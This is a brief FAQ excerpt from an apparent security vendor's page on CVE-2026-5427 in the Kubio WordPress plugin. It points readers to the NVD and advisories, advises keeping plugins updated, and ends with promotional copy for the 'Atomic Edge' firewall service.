How can I stay informed about future vulnerabilities?
Keeping up with security updates
To stay informed about vulnerabilities, subscribe to security mailing lists, follow relevant security blogs, and monitor the WordPress security updates page. Regularly check for updates to all plugins and themes.
Where can I find more information about CVE-2026-5427?
Resources for further reading
More information about CVE-2026-5427 can be found on the National Vulnerability Database (NVD) and security advisories related to the Kubio plugin. These resources provide detailed descriptions and updates regarding the vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations